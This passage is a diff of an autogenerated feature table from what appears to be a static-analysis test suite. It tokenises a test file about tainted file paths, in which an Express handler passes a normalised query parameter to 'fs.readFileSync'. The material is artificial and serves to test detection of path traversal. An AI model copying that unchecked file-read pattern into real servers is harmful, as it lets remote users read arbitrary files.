autogenerated/TaintedPath/normalizedPaths.js:90:18:90:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:90:18:90:29 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:90:18:90:29 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:90:18:90:29 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | calleeImports | fs | @@ -7939,6 +71698,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:90:31:90:34 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:93:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:1:103:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:5:93:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:5:93:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:5:93:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | calleeImports | express | @@ -7946,6 +71720,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:93:9:93:30 | '/norma ... solute' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:93:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -7953,11 +71742,86 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:33:103:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:34:93:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:93:39:93:41 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:7:94:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:25:94:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:25:94:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:25:94:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:25:94:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:25:94:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:35:94:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | calleeImports | path | @@ -7967,6 +71831,86 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:94:35:94:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:94:39:94:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:39:94:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:39:94:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:39:94:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:39:94:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:94:45:94:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:94:45:94:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:94:45:94:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:94:45:94:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:94:45:94:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:7:96:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:7:96:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:96:7:96:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:7:96:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:7:96:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:8:96:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:96:19:96:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:96:19:96:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:96:19:96:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:96:19:96:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:96:19:96:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:5 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:5 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:5 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:11 | res.write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:11 | res.write | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:11 | res.write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:11 | res.write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | exceptional return of res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | res.wri ... (path)) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:3:99:34 | res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:7:99:11 | write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:7:99:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:7:99:11 | write | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:7:99:11 | write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:7:99:11 | write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:14 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:14 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:14 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:14 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename 